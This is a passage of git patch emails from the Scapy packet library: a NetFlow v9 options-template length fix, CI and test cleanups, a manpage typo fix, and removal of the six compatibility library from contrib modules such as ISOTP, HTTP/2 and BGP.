e) + except (AttributeError, KeyError): + pass + # log_automotive.debug("Cleanup TP-Sender Error: %s", e) return True def get_transition_function(self, socket, edge): diff --git a/scapy/contrib/isotp/isotp_soft_socket.py b/scapy/contrib/isotp/isotp_soft_socket.py index 5538698aaa4..f0ff5bd5fd9 100644 --- a/scapy/contrib/isotp/isotp_soft_socket.py +++ b/scapy/contrib/isotp/isotp_soft_socket.py @@ -105,8 +105,6 @@ class ISOTPSoftSocket(SuperSocket): :param basecls: base class of the packets emitted by this socket """ # noqa: E501 - nonblocking_socket = True - def __init__(self, can_socket=None, # type: Optional["CANSocket"] tx_id=0, # type: int @@ -972,9 +970,5 @@ def send(self, p): def recv(self, timeout=None): # type: (Optional[int]) -> Optional[Tuple[bytes, Union[float, EDecimal]]] # noqa: E501 - """Receive an ISOTP frame, blocking if none is available in the buffer - for at most 'timeout' seconds.""" - try: - return self.rx_queue.recv() - except IndexError: - return None + """Receive an ISOTP frame, blocking if none is available in the buffer.""" + return self.rx_queue.recv() diff --git a/test/contrib/isotpscan.uts b/test/contrib/isotpscan.uts index 1c75e8cf936..733e293fed4 100644 --- a/test/contrib/isotpscan.uts +++ b/test/contrib/isotpscan.uts @@ -79,7 +79,7 @@ for idx in range(1, 4): sockets.append(ISOTPSoftSocket(sock_recv, tx_id=0x700 + idx, rx_id=0x600 + idx)) found_packets = scan(sock_sender, range(0x5ff, 0x604), - noise_ids=[0x701], sniff_time=0.02) + noise_ids=[0x701], sniff_time=0.1) for s in sockets: s.close() @@ -97,7 +97,7 @@ sock_sender.pair(sock_recv) with ISOTPSoftSocket(sock_recv, tx_id=0x700, rx_id=0x601, ext_address=0xaa, rx_ext_address=0xbb): found_packets = scan_extended(sock_sender, [0x600, 0x601], extended_scan_range=range(0xb0, 0xc0), - sniff_time=0.02) + sniff_time=0.1) fpkt = found_packets[list(found_packets.keys())[0]][0] rpkt = CAN(flags=0, identifier=0x700, length=4, data=b'\xaa0\x00\x00') From ca774d23137c3c0ac7cdc102f84e40578758155e Mon Sep 17 00:00:00 2001 From: Nicolas Bloyet Date: Tue, 17 Jan 2023 12:40:01 +0100 Subject: [PATCH 0943/1632] Fix proposition for #3831 - Options Template length not compliant with RFC 3954 (#3832) --- scapy/layers/netflow.py | 4 ++-- test/scapy/layers/netflow.uts | 16 ++++++++++++++++ 2 files changed, 18 insertions(+), 2 deletions(-) diff --git a/scapy/layers/netflow.py b/scapy/layers/netflow.py index 8f7918a35d0..77ffda21e77 100644 --- a/scapy/layers/netflow.py +++ b/scapy/layers/netflow.py @@ -1659,12 +1659,12 @@ def default_payload_class(self, p): return conf.padding_layer def post_build(self, pkt, pay): - if self.length is None: - pkt = pkt[:2] + struct.pack("!H", len(pkt)) + pkt[4:] if self.pad is None: # Padding 4-bytes with b"\x00" start = 10 + self.option_scope_length + self.option_field_length pkt = pkt[:start] + (-len(pkt) % 4) * b"\x00" + if self.length is None: + pkt = pkt[:2] + struct.pack("!H", len(pkt)) + pkt[4:] return pkt + pay diff --git a/test/scapy/layers/netflow.uts b/test/scapy/layers/netflow.uts index e15f0f0377e..d43735d6299 100644 --- a/test/scapy/layers/netflow.uts +++ b/test/scapy/layers/netflow.uts @@ -156,6 +156,22 @@ assert pkt[NetflowOptionsFlowsetV9].pad == b"\x00\x00" pkt[NetflowOptionsFlowsetV9].pad = None assert raw(pkt) == dat += NetflowV9 - Options Template build +~ netflow + +option_templateFlowSet_256 = NetflowOptionsFlowsetV9( + templateID = 256, + option_scope_length = 4*1, + option_field_length = 4*3, + scopes = [ + NetflowOptionsFlowsetScopeV9(scopeFieldType=1, scopeFieldlength= 4), + ], + options = [ + NetflowOptionsFlowsetOptionV9(optionFieldType= 10, optionFieldlength= 4), + NetflowOptionsFlowsetOptionV9(optionFieldType= 82, optionFieldlength= 32), + NetflowOptionsFlowsetOptionV9(optionFieldType= 83, optionFieldlength= 240) + ]) +assert raw(option_templateFlowSet_256) == b'\x00\x01\x00\x1c\x01\x00\x00\x04\x00\x0c\x00\x01\x00\x04\x00\n\x00\x04\x00R\x00 \x00S\x00\xf0\x00\x00' ############ ############ From 80ba91248ca3480def76adf09e7632364da6c94b Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Fri, 13 Jan 2023 14:53:26 +0100 Subject: [PATCH 0944/1632] Remove winpcap test Remove winpcap test (frozen to death). --- .appveyor.yml | 27 --------------------------- 1 file changed, 27 deletions(-) diff --git a/.appveyor.yml b/.appveyor.yml index 677f3c982c9..873103b8a96 100644 --- a/.appveyor.yml +++ b/.appveyor.yml @@ -11,19 +11,11 @@ environment: PYTHON_VERSION: "3.7.x" PYTHON_ARCH: "64" TOXENV: "py37-windows" - WINPCAP: "false" UT_FLAGS: "-K scanner" - PYTHON: "C:\\Python37-x64" PYTHON_VERSION: "3.7.x" PYTHON_ARCH: "64" TOXENV: "py37-windows" - WINPCAP: "true" - UT_FLAGS: "-K tcpdump -K scanner" - - PYTHON: "C:\\Python37-x64" - PYTHON_VERSION: "3.7.x" - PYTHON_ARCH: "64" - TOXENV: "py37-windows" - WINPCAP: "false" UT_FLAGS: "-k scanner" # There is no build phase for Scapy @@ -42,25 +34,6 @@ install: - "%PYTHON%\\python -m pip install virtualenv --upgrade" - "%PYTHON%\\python -m pip install tox coverage" -# Compatibility run with Winpcap -# XXX Remove me when wireshark stops using it as default -for: - - - matrix: - allow_failures: - - UT_FLAGS: "-k scanner" - only: - - WINPCAP: "true" - install: - # Install the winpcap and wireshark suites - - choco install -y winpcap - # See above for explanations - - choco install -n KB3033929 KB2919355 kb2999226 - - choco install -y wireshark - # Install Python modules - - "%PYTHON%\\python -m pip install virtualenv --upgrade" - - "%PYTHON%\\python -m pip install tox coverage" - test_script: # Set environment variables - set PYTHONPATH=%APPVEYOR_BUILD_FOLDER% From e83735b8a7eb5a780dfc431fd035f9a4c330122f Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Wed, 11 Jan 2023 11:46:28 +0100 Subject: [PATCH 0945/1632] Remove resource-heavy ISOTP test --- test/contrib/isotp_packet.uts | 11 ----------- 1 file changed, 11 deletions(-) diff --git a/test/contrib/isotp_packet.uts b/test/contrib/isotp_packet.uts index d3f11a322c6..5dda1af485f 100644 --- a/test/contrib/isotp_packet.uts +++ b/test/contrib/isotp_packet.uts @@ -406,17 +406,6 @@ except Scapy_Exception: assert ex -= Fragment exception -~ not_pypy - -ex = False -try: - fragments = ISOTP(b"a" * (1 << 32)).fragment() -except Scapy_Exception: - ex = True - -assert ex - = Defragment an ISOTP message composed of multiple CAN frames fragments = [ CAN(identifier=0x641, data=dhex("41 10 10 61 62 63 64 65")), From 77a93a2235929457ba549ef2a17b73bbfddc3544 Mon Sep 17 00:00:00 2001 From: Evgeny Vereshchagin Date: Wed, 11 Jan 2023 11:49:15 +0100 Subject: [PATCH 0946/1632] Fix test without netbase --- test/scapy/layers/inet.uts | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/test/scapy/layers/inet.uts b/test/scapy/layers/inet.uts index dd7efa68c86..a8987ec3fa9 100644 --- a/test/scapy/layers/inet.uts +++ b/test/scapy/layers/inet.uts @@ -573,7 +573,7 @@ def test_summary(): "IP / ICMP 192.168.0.9 > 192.168.0.254 time-exceeded " "ttl-zero-during-transit / IPerror / TCPerror / " "Raw" % (ftp_data, http) in result_summary - for ftp_data in ['21', 'ftp_data'] + for ftp_data in ['20', 'ftp_data'] for http in ['80', 'http', 'www_http', 'www'] )) From b06f437d63722041d3c03193fafa797a3074a025 Mon Sep 17 00:00:00 2001 From: Carlos Henrique Lima Melara Date: Wed, 11 Jan 2023 00:00:00 +0100 Subject: [PATCH 0947/1632] fix typo in manpage Forwarded: https://github.com/secdev/scapy/pull/3848 --- doc/scapy.1 | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/doc/scapy.1 b/doc/scapy.1 index f926cb3015b..a58643d63c2 100644 --- a/doc/scapy.1 +++ b/doc/scapy.1 @@ -72,7 +72,7 @@ If a string is given as parameter, it is used to filter the layers. .TP \fBexplore()\fR explores available protocols. -Allows to look for a layer or protocol through an interactive GUI. +Allows one to look for a layer or protocol through an interactive GUI. If a Scapy module is given as parameter, explore this specific module. .TP \fBlsc()\fR From d8640e82c97b58a8b09976eccf3c62fe465ad451 Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Fri, 13 Jan 2023 21:37:03 +0100 Subject: [PATCH 0948/1632] Fix tests that require git on non-git installs --- test/regression.uts | 28 +++++++++++++++++++++------- test/run_tests | 2 +- 2 files changed, 22 insertions(+), 8 deletions(-) diff --git a/test/regression.uts b/test/regression.uts index 7ce792fbe3a..1c0b42b9d65 100644 --- a/test/regression.uts +++ b/test/regression.uts @@ -53,9 +53,19 @@ from scapy import _parse_tag, _version_from_git_describe from scapy.config import _version_checker b = Bunch(returncode=0, communicate=lambda *args, **kargs: (b"v2.4.5rc1-261-g44b98e14", None)) -with mock.patch('scapy.subprocess.Popen', return_value=b) as popen: - class GitModuleScapy(object): - __version__ = _version_from_git_describe() +with mock.patch('scapy.subprocess.Popen', return_value=b): + with mock.patch('scapy.os.path.isdir', return_value=True): + class GitModuleScapy(object): + __version__ = _version_from_git_describe() + +# GH3847 +with mock.patch('scapy.subprocess.Popen', return_value=b): + with mock.patch('scapy.os.path.isdir', return_value=False): + try: + _version_from_git_describe() + assert False + except ValueError: + pass assert GitModuleScapy.__version__ == '2.4.5rc1.dev261' assert _version_checker(GitModuleScapy, (2, 4, 5)) @@ -4760,10 +4770,14 @@ with open(version_filename, "w") as fd: import mock with mock.patch("scapy._version_from_git_describe") as version_mocked: - version_mocked.side_effect = Exception() - assert scapy._version() == version - os.unlink(version_filename) - assert scapy._version() == "unknown.version" + with mock.patch('scapy.os.path.isdir', return_value=True): + version_mocked.side_effect = Exception() + # mocking _parse_tag is a fallback for when run outside of git + with mock.patch('scapy._parse_tag', return_value=version): + assert scapy._version() == version + os.unlink(version_filename) + with mock.patch('scapy._parse_tag', return_value='unknown.version'): + assert scapy._version() == "unknown.version" = UTscapy HTML output diff --git a/test/run_tests b/test/run_tests index 5d886e20a54..49a10e9f987 100755 --- a/test/run_tests +++ b/test/run_tests @@ -54,7 +54,7 @@ then fi # Run tox - export UT_FLAGS="-K tcpdump -K manufdb -K wireshark -K ci_only -K vcan_socket -K automotive_comm -K imports -K scanner" + export UT_FLAGS="-K tcpdump -K manufdb -K wireshark -K tshark -K ci_only -K vcan_socket -K automotive_comm -K imports -K scanner" export SIMPLE_TESTS="true" export PYTHON PYVER=$($PYTHON -c "import sys; print('.'.join(sys.version.split('.')[:2]))") From 3ce66d12ef07d2fb8f1a4a8277ed90277480b9c3 Mon Sep 17 00:00:00 2001 From: Pierre Lalet Date: Sun, 15 Jan 2023 19:11:44 +0100 Subject: [PATCH 0949/1632] Drop six library (second batch - contrib/) --- scapy/contrib/automotive/scanner/executor.py | 4 +- scapy/contrib/automotive/scanner/test_case.py | 10 ++--- scapy/contrib/automotive/uds_scan.py | 13 +----- scapy/contrib/bgp.py | 3 +- scapy/contrib/cansocket.py | 3 +- scapy/contrib/cansocket_python_can.py | 2 +- scapy/contrib/diameter.py | 3 +- scapy/contrib/eddystone.py | 3 +- scapy/contrib/ethercat.py | 3 +- scapy/contrib/http2.py | 26 +++++------ scapy/contrib/icmp_extensions.py | 3 +- scapy/contrib/isotp/__init__.py | 3 +- scapy/contrib/isotp/isotp_native_socket.py | 3 +- scapy/contrib/isotp/isotp_soft_socket.py | 45 +++++++++---------- scapy/contrib/isotp/isotp_utils.py | 14 +++--- scapy/contrib/ltp.py | 3 +- scapy/contrib/macsec.py | 5 +-- scapy/contrib/nfs.py | 3 +- scapy/contrib/openflow.py | 3 +- scapy/contrib/openflow3.py | 3 +- scapy/contrib/pnio.py | 3 +- scapy/contrib/ppi_geotag.py | 5 +-- 22 files changed, 61 insertions(+), 102 deletions(-) diff --git a/scapy/contrib/automotive/scanner/executor.py b/scapy/contrib/automotive/scanner/executor.py index 2803d9dff50..b2d0b942621 100644 --- a/scapy/contrib/automotive/scanner/executor.py +++ b/scapy/contrib/automotive/scanner/executor.py @@ -18,7 +18,6 @@ from scapy.error import Scapy_Exception from scapy.supersocket import SuperSocket from scapy.utils import make_lined_table, SingleConversationSocket -import scapy.libs.six as six from scapy.contrib.automotive.ecu import EcuState, EcuResponse, Ecu from scapy.contrib.automotive.scanner.configuration import \ AutomotiveTestCaseExecutorConfiguration @@ -27,8 +26,7 @@ AutomotiveTestCase -@six.add_metaclass(abc.ABCMeta) -class AutomotiveTestCaseExecutor: +class AutomotiveTestCaseExecutor(metaclass=abc.ABCMeta): """ Base class for different automotive scanners. This class handles the connection to a scan target, ensures the execution of all it's diff --git a/scapy/contrib/automotive/scanner/test_case.py b/scapy/contrib/automotive/scanner/test_case.py index a4d30bd582e..a296f753c70 100644 --- a/scapy/contrib/automotive/scanner/test_case.py +++ b/scapy/contrib/automotive/scanner/test_case.py @@ -13,7 +13,6 @@ from scapy.compat import Any, Union, List, Optional, \ Dict, Tuple, Set, Callable, TYPE_CHECKING from scapy.utils import make_lined_table, SingleConversationSocket -import scapy.libs.six as six from scapy.supersocket import SuperSocket from scapy.contrib.automotive.scanner.graph import _Edge from scapy.contrib.automotive.ecu import EcuState, EcuResponse @@ -31,8 +30,7 @@ _TransitionTuple = Tuple[_TransitionCallable, Dict[str, Any], Optional[_CleanupCallable]] # noqa: E501 -@six.add_metaclass(abc.ABCMeta) -class AutomotiveTestCaseABC: +class AutomotiveTestCaseABC(metaclass=abc.ABCMeta): """ Base class for "TestCase" objects. In automotive scanners, these TestCase objects are used for individual tasks, for example enumerating over one @@ -229,16 +227,14 @@ def show(self, dump=False, filtered=True, verbose=False): return None -@six.add_metaclass(abc.ABCMeta) -class TestCaseGenerator: +class TestCaseGenerator(metaclass=abc.ABCMeta): @abc.abstractmethod def get_generated_test_case(self): # type: () -> Optional[AutomotiveTestCaseABC] raise NotImplementedError() -@six.add_metaclass(abc.ABCMeta) -class StateGenerator: +class StateGenerator(metaclass=abc.ABCMeta): @abc.abstractmethod def get_new_edge(self, socket, config): diff --git a/scapy/contrib/automotive/uds_scan.py b/scapy/contrib/automotive/uds_scan.py index 55ee2052440..277f809cc58 100644 --- a/scapy/contrib/automotive/uds_scan.py +++ b/scapy/contrib/automotive/uds_scan.py @@ -6,6 +6,7 @@ # scapy.contrib.description = UDS AutomotiveTestCaseExecutor # scapy.contrib.status = loads +from abc import ABC import struct import random import time @@ -21,7 +22,6 @@ cast, Union, orb, Set, Sequence from scapy.contrib.automotive import log_automotive from scapy.packet import Raw, Packet -import scapy.libs.six as six from scapy.error import Scapy_Exception from scapy.contrib.automotive.uds import UDS, UDS_NR, UDS_DSC, UDS_TP, \ UDS_RDBI, UDS_WDBI, UDS_SA, UDS_RC, UDS_IOCBI, UDS_RMBA, UDS_ER, \ @@ -42,12 +42,6 @@ # TODO: Refactor this import from scapy.contrib.automotive.uds_ecu_states import * # noqa: F401, F403 -if six.PY34: - from abc import ABC -else: - from abc import ABCMeta - - ABC = ABCMeta('ABC', (), {}) # type: ignore # Definition outside the class UDS_RMBASequentialEnumerator # to allow pickling @@ -706,10 +700,7 @@ def get_security_access(self, sock, level=1, seed_pkt=None): def transition_function(self, sock, _, kwargs): # type: (_SocketUnion, AutomotiveTestCaseExecutorConfiguration, Dict[str, Any]) -> bool # noqa: E501 - if six.PY3: - spec = inspect.getfullargspec(self.get_security_access) - else: - spec = inspect.getargspec(self.get_security_access) + spec = inspect.getfullargspec(self.get_security_access) func_kwargs = {k: kwargs[k] for k in spec.args if k in kwargs.keys()} return self.get_security_access(sock, **func_kwargs) diff --git a/scapy/contrib/bgp.py b/scapy/contrib/bgp.py index 75a13b3de8f..af988cf08df 100644 --- a/scapy/contrib/bgp.py +++ b/scapy/contrib/bgp.py @@ -27,7 +27,6 @@ from scapy.config import conf, ConfClass from scapy.compat import orb, chb from scapy.error import log_runtime -import scapy.libs.six as six # @@ -634,7 +633,7 @@ class _BGPCapability_metaclass(_BGPCap_metaclass, Packet_metaclass): pass -class BGPCapability(six.with_metaclass(_BGPCapability_metaclass, Packet)): +class BGPCapability(Packet, metaclass=_BGPCapability_metaclass): """ Generic BGP capability. """ diff --git a/scapy/contrib/cansocket.py b/scapy/contrib/cansocket.py index 27cb76d6343..a50d2352c76 100644 --- a/scapy/contrib/cansocket.py +++ b/scapy/contrib/cansocket.py @@ -13,7 +13,6 @@ from scapy.error import log_loading from scapy.consts import LINUX from scapy.config import conf -import scapy.libs.six as six PYTHON_CAN = False @@ -31,7 +30,7 @@ log_loading.info("Using python-can CANSockets.\nSpecify 'conf.contribs['CANSocket'] = {'use-python-can': False}' to enable native CANSockets.") # noqa: E501 from scapy.contrib.cansocket_python_can import (PythonCANSocket, CANSocket) # noqa: E501 F401 -elif LINUX and six.PY3 and not conf.use_pypy: +elif LINUX and not conf.use_pypy: log_loading.info("Using native CANSockets.\nSpecify 'conf.contribs['CANSocket'] = {'use-python-can': True}' to enable python-can CANSockets.") # noqa: E501 from scapy.contrib.cansocket_native import (NativeCANSocket, CANSocket) # noqa: E501 F401 diff --git a/scapy/contrib/cansocket_python_can.py b/scapy/contrib/cansocket_python_can.py index 3b68cdc9422..0e5e3011222 100644 --- a/scapy/contrib/cansocket_python_can.py +++ b/scapy/contrib/cansocket_python_can.py @@ -16,6 +16,7 @@ from functools import reduce from operator import add +import queue from scapy.config import conf from scapy.supersocket import SuperSocket @@ -24,7 +25,6 @@ from scapy.error import warning from scapy.compat import List, Type, Tuple, Dict, Any, \ Optional, cast, orb -from scapy.libs.six.moves import queue from can import Message as can_Message from can import CanError as can_CanError diff --git a/scapy/contrib/diameter.py b/scapy/contrib/diameter.py index a53eee3c810..1bf1502e2f0 100644 --- a/scapy/contrib/diameter.py +++ b/scapy/contrib/diameter.py @@ -33,7 +33,6 @@ XByteField, XIntField from scapy.layers.inet import TCP from scapy.layers.sctp import SCTPChunkData -import scapy.libs.six as six from scapy.compat import chb, orb, raw, bytes_hex, plain_str from scapy.error import warning from scapy.utils import inet_ntoa, inet_aton @@ -4781,7 +4780,7 @@ def getCmdParams(cmd, request, **fields): val = fields['drAppId'] if isinstance(val, str): # Translate into application Id code found = False - for k, v in six.iteritems(AppIDsEnum): + for k, v in AppIDsEnum.items(): if v.find(val) != -1: drAppId = k fields['drAppId'] = drAppId diff --git a/scapy/contrib/eddystone.py b/scapy/contrib/eddystone.py index 7cd41b05ec7..554f8b3bdb6 100644 --- a/scapy/contrib/eddystone.py +++ b/scapy/contrib/eddystone.py @@ -24,7 +24,6 @@ StrFixedLenField, ShortField, FixedPointField, ByteEnumField from scapy.layers.bluetooth import EIR_Hdr, EIR_ServiceData16BitUUID, \ EIR_CompleteList16BitServiceUUIDs, LowEnergyBeaconHelper -import scapy.libs.six as six from scapy.packet import bind_layers, Packet EDDYSTONE_UUID = 0xfeaa @@ -94,7 +93,7 @@ def m2i(self, pkt, x): return bytes(o) def any2i(self, pkt, x): - if isinstance(x, six.text_type): + if isinstance(x, str): x = x.encode("ascii") return x diff --git a/scapy/contrib/ethercat.py b/scapy/contrib/ethercat.py index 6257d64879b..2a8d63db981 100644 --- a/scapy/contrib/ethercat.py +++ b/scapy/contrib/ethercat.py @@ -44,7 +44,6 @@ from scapy.fields import BitField, ByteField, LEShortField, FieldListField, \ LEIntField, FieldLenField, _EnumField, EnumField from scapy.layers.l2 import Ether, Dot1Q -import scapy.libs.six as six from scapy.packet import bind_layers, Packet, Padding ''' @@ -252,7 +251,7 @@ def __init__(self, name, default, size, length_of=None, count_of=None, adjust=la self.adjust = adjust def i2m(self, pkt, x): - return (FieldLenField.i2m.__func__ if six.PY2 else FieldLenField.i2m)(self, pkt, x) # noqa: E501 + return FieldLenField.i2m(self, pkt, x) class LEBitEnumField(LEBitField, _EnumField): diff --git a/scapy/contrib/http2.py b/scapy/contrib/http2.py index 68e6dbb12d2..000c2d70414 100644 --- a/scapy/contrib/http2.py +++ b/scapy/contrib/http2.py @@ -22,7 +22,6 @@ import re from io import BytesIO import struct -import scapy.libs.six as six from scapy.compat import raw, plain_str, hex_bytes, orb, chb, bytes_encode # Only required if using mypy-lang for static typing @@ -94,7 +93,7 @@ def getfield(self, pkt, s): assert ( isinstance(r, tuple) and len(r) == 2 and - isinstance(r[1], six.integer_types) + isinstance(r[1], int) ), 'Second element of BitField.getfield return value expected to be an int or a long; API change detected' # noqa: E501 assert r[1] == self._magic, 'Invalid value parsed from s; error in class guessing detected!' # noqa: E501 return r @@ -186,14 +185,14 @@ def __init__(self, name, default, size): :return: None :raises: AssertionError """ - assert default is None or (isinstance(default, six.integer_types) and default >= 0) # noqa: E501 + assert default is None or (isinstance(default, int) and default >= 0) assert 0 < size <= 8 super(AbstractUVarIntField, self).__init__(name, default) self.size = size self._max_value = (1 << self.size) - 1 - # Configuring the fake property that is useless for this class but that is # noqa: E501 - # expected from BitFields + # Configuring the fake property that is useless for this class + # but that is expected from BitFields self.rev = False def h2i(self, pkt, x): @@ -204,7 +203,7 @@ def h2i(self, pkt, x): :return: int|None: the converted value. :raises: AssertionError """ - assert not isinstance(x, six.integer_types) or x >= 0 + assert not isinstance(x, int) or x >= 0 return x def i2h(self, pkt, x): @@ -330,14 +329,14 @@ def any2i(self, pkt, x): """ if isinstance(x, type(None)): return x - if isinstance(x, six.integer_types): + if isinstance(x, int): assert x >= 0 ret = self.h2i(pkt, x) - assert isinstance(ret, six.integer_types) and ret >= 0 + assert isinstance(ret, int) and ret >= 0 return ret elif isinstance(x, bytes): ret = self.m2i(pkt, x) - assert (isinstance(ret, six.integer_types) and ret >= 0) + assert (isinstance(ret, int) and ret >= 0) return ret assert False, 'EINVAL: x: No idea what the parameter format is' @@ -630,8 +629,7 @@ def _compute_value(self, pkt): ############################################################################### -@six.add_metaclass(abc.ABCMeta) -class HPackStringsInterface(Sized): # type: ignore +class HPackStringsInterface(Sized, metaclass=abc.ABCMeta): # type: ignore @abc.abstractmethod def __str__(self): pass @@ -2047,7 +2045,7 @@ def extract_padding(self, s): :return: (str, str): the padding and the payload data strings :raises: AssertionError """ - assert isinstance(self.len, six.integer_types) and self.len >= 0, 'Invalid length: negative len?' # noqa: E501 + assert isinstance(self.len, int) and self.len >= 0, 'Invalid length: negative len?' # noqa: E501 assert len(s) >= self.len, 'Invalid length: string too short for this length' # noqa: E501 return s[:self.len], s[self.len:] @@ -2405,7 +2403,7 @@ def get_idx_by_name(self, name): If no matching header is found, this method returns None. """ name = name.lower() - for key, val in six.iteritems(type(self)._static_entries): + for key, val in type(self)._static_entries.items(): if val.name() == name: return key for idx, val in enumerate(self._dynamic_table): @@ -2424,7 +2422,7 @@ def get_idx_by_name_and_value(self, name, value): If no matching header is found, this method returns None. """ name = name.lower() - for key, val in six.iteritems(type(self)._static_entries): + for key, val in type(self)._static_entries.items(): if val.name() == name and val.value() == value: return key for idx, val in enumerate(self._dynamic_table): diff --git a/scapy/contrib/icmp_extensions.py b/scapy/contrib/icmp_extensions.py index c168df265c3..44cca2cca3c 100644 --- a/scapy/contrib/icmp_extensions.py +++ b/scapy/contrib/icmp_extensions.py @@ -17,7 +17,6 @@ from scapy.layers.inet6 import IP6Field from scapy.error import warning from scapy.contrib.mpls import MPLS -import scapy.libs.six as six from scapy.config import conf @@ -60,7 +59,7 @@ def guess_payload_class(self, payload): for fval, cls in self.payload_guess: if all(hasattr(ieo, k) and v == ieo.getfieldval(k) - for k, v in six.iteritems(fval)): + for k, v in fval.items()): return cls return ICMPExtensionObject diff --git a/scapy/contrib/isotp/__init__.py b/scapy/contrib/isotp/__init__.py index 7fb0f8b8f51..d22b84cc764 100644 --- a/scapy/contrib/isotp/__init__.py +++ b/scapy/contrib/isotp/__init__.py @@ -9,7 +9,6 @@ import logging from scapy.consts import LINUX -import scapy.libs.six as six from scapy.config import conf from scapy.error import log_loading @@ -30,7 +29,7 @@ log_isotp = logging.getLogger("scapy.contrib.isotp") log_isotp.setLevel(logging.INFO) -if six.PY3 and LINUX: +if LINUX: try: if conf.contribs['ISOTP']['use-can-isotp-kernel-module']: USE_CAN_ISOTP_KERNEL_MODULE = True diff --git a/scapy/contrib/isotp/isotp_native_socket.py b/scapy/contrib/isotp/isotp_native_socket.py index a99d8c0de99..3f2228e7eed 100644 --- a/scapy/contrib/isotp/isotp_native_socket.py +++ b/scapy/contrib/isotp/isotp_native_socket.py @@ -14,7 +14,6 @@ from scapy.compat import Optional, Union, Tuple, Type, cast from scapy.contrib.isotp import log_isotp from scapy.packet import Packet -import scapy.libs.six as six from scapy.error import Scapy_Exception from scapy.supersocket import SuperSocket from scapy.data import SO_TIMESTAMPNS @@ -297,7 +296,7 @@ def __init__(self, ): # type: (...) -> None - if not isinstance(iface, six.string_types): + if not isinstance(iface, str): # This is for interoperability with ISOTPSoftSockets. # If a NativeCANSocket is provided, the interface name of this # socket is extracted and an ISOTPNativeSocket will be opened diff --git a/scapy/contrib/isotp/isotp_soft_socket.py b/scapy/contrib/isotp/isotp_soft_socket.py index f0ff5bd5fd9..2a98eb575ca 100644 --- a/scapy/contrib/isotp/isotp_soft_socket.py +++ b/scapy/contrib/isotp/isotp_soft_socket.py @@ -19,7 +19,6 @@ Callable, TYPE_CHECKING from scapy.packet import Packet from scapy.layers.can import CAN -import scapy.libs.six as six from scapy.error import Scapy_Exception from scapy.supersocket import SuperSocket from scapy.config import conf @@ -119,10 +118,10 @@ def __init__(self, ): # type: (...) -> None - if six.PY3 and LINUX and isinstance(can_socket, six.string_types): + if LINUX and isinstance(can_socket, str): from scapy.contrib.cansocket_native import NativeCANSocket can_socket = NativeCANSocket(can_socket) - elif isinstance(can_socket, six.string_types): + elif isinstance(can_socket, str): raise Scapy_Exception("Provide a CANSocket object instead") self.ext_address = ext_address @@ -375,8 +374,6 @@ def _poll(cls): @staticmethod def _time(): # type: () -> float - if six.PY2: - return time.time() return time.monotonic() class Handle: @@ -513,7 +510,7 @@ def __init__(self, self.tx_queue = ObjectPipe[bytes]() self.txfc_bs = 0 self.txfc_stmin = 0 - self.tx_gap = 0 + self.tx_gap = 0. self.tx_buf = None # type: Optional[bytes] self.tx_sn = 0 @@ -687,10 +684,10 @@ def on_recv(self, cf): ae = 1 if len(data) < 3: return - if six.indexbytes(data, 0) != self.rx_ext_address: + if data[0] != self.rx_ext_address: return - n_pci = six.indexbytes(data, ae) & 0xf0 + n_pci = data[ae] & 0xf0 if n_pci == N_PCI_FC: self._recv_fc(data[ae:]) @@ -721,24 +718,23 @@ def _recv_fc(self, data): # get communication parameters only from the first FC frame if self.tx_state == ISOTP_WAIT_FIRST_FC: - self.txfc_bs = six.indexbytes(data, 1) - self.txfc_stmin = six.indexbytes(data, 2) + self.txfc_bs = data[1] + self.txfc_stmin = data[2] if ((self.txfc_stmin > 0x7F) and ((self.txfc_stmin < 0xF1) or (self.txfc_stmin > 0xF9))): self.txfc_stmin = 0x7F - if six.indexbytes(data, 2) <= 127: - tx_gap = six.indexbytes(data, 2) / 1000.0 - elif 0xf1 <= six.indexbytes(data, 2) <= 0xf9: - tx_gap = (six.indexbytes(data, 2) & 0x0f) / 10000.0 + if data[2] <= 127: + self.tx_gap = data[2] / 1000 + elif 0xf1 <= data[2] <= 0xf9: + self.tx_gap = (data[2] & 0x0f) / 10000 else: - tx_gap = 0 - self.tx_gap = tx_gap + self.tx_gap = 0. self.tx_state = ISOTP_WAIT_FC - isotp_fc = six.indexbytes(data, 0) & 0x0f + isotp_fc = data[0] & 0x0f if isotp_fc == ISOTP_FC_CTS: self.tx_bs = 0 @@ -776,7 +772,7 @@ def _recv_sf(self, data, ts): "single frame was received") self.rx_state = ISOTP_IDLE - length = six.indexbytes(data, 0) & 0xf + length = data[0] & 0xf if len(data) - 1 < length: return @@ -802,17 +798,16 @@ def _recv_ff(self, data, ts): self.rx_ll_dl = len(data) # get the FF_DL - self.rx_len = (six.indexbytes(data, 0) & 0x0f) * 256 + six.indexbytes( - data, 1) + self.rx_len = (data[0] & 0x0f) * 256 + data[1] ff_pci_sz = 2 # Check for FF_DL escape sequence supporting 32 bit PDU length if self.rx_len == 0: # FF_DL = 0 => get real length from next 4 bytes - self.rx_len = six.indexbytes(data, 2) << 24 - self.rx_len += six.indexbytes(data, 3) << 16 - self.rx_len += six.indexbytes(data, 4) << 8 - self.rx_len += six.indexbytes(data, 5) + self.rx_len = data[2] << 24 + self.rx_len += data[3] << 16 + self.rx_len += data[4] << 8 + self.rx_len += data[5] ff_pci_sz = 6 # copy the first received data bytes @@ -861,7 +856,7 @@ def _recv_cf(self, data): log_isotp.warning("Received a CF with insufficient length") return - if six.indexbytes(data, 0) & 0x0f != self.rx_sn: + if data[0] & 0x0f != self.rx_sn: # Wrong sequence number if conf.verb > 2: log_isotp.warning("RX state was reset because wrong sequence " diff --git a/scapy/contrib/isotp/isotp_utils.py b/scapy/contrib/isotp/isotp_utils.py index 05bddd3fc4c..62de7386a55 100644 --- a/scapy/contrib/isotp/isotp_utils.py +++ b/scapy/contrib/isotp/isotp_utils.py @@ -17,7 +17,6 @@ from scapy.sessions import DefaultSession from scapy.contrib.isotp.isotp_packet import ISOTP, N_PCI_CF, N_PCI_SF, \ N_PCI_FF, N_PCI_FC -import scapy.libs.six as six class ISOTPMessageBuilderIter(object): @@ -92,10 +91,7 @@ def push(self, piece): self.pieces.append(piece) self.current_len += len(piece) if self.current_len >= self.total_len: - if six.PY3: - isotp_data = b"".join(self.pieces) - else: - isotp_data = "".join(map(str, self.pieces)) + isotp_data = b"".join(self.pieces) self.ready = isotp_data[:self.total_len] def __init__( @@ 